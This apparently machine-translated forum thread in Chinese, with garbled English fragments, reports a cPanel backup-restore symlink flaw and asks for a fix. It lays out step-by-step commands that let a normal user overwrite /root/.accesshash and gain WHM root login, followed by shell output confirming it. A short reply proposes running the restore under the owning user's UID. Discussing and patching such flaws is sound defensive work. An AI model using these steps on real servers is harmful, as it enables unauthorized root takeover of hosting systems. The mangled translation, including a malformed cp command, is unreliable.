我目前正在研究cPanel备份解决scheme。 我们现在被告知这个漏洞。
利用:完全根访问服务器
1.)从正常用户帐户创build恶意文件:
mkdir root echo "hello" > root/.accesshash 2.)等待备份运行
3.)用一个符号链接replaceroot:
ln -s /root root
4.)恢复root / .accesshash(我正在以root运行这个命令:“cp -rf /backup/.accesshash/home/user/root/”)
5.)用户现在拥有root权限,因为我们覆盖了/root/.accesshash。 攻击者可以通过将访问哈希放入此文件,以root用户身份login到WHM。
root@cpanel [/home/master]# cat /root/.accesshash hello root@cpanel [/home/master]# ls -l /root/.accesshash -rw-r--r-- 1 master master 3 Nov 20 21:41 /root/.accesshash root@cpanel [/home/master]#
有人可以build议我这个解决方法吗? 提前致谢。
我会确保备份文件可以被他们所属的用户访问,并用这个用户的UID启动复制/ rsync。 这样,cp / rsync将不能跟随符号链接并写入/root 。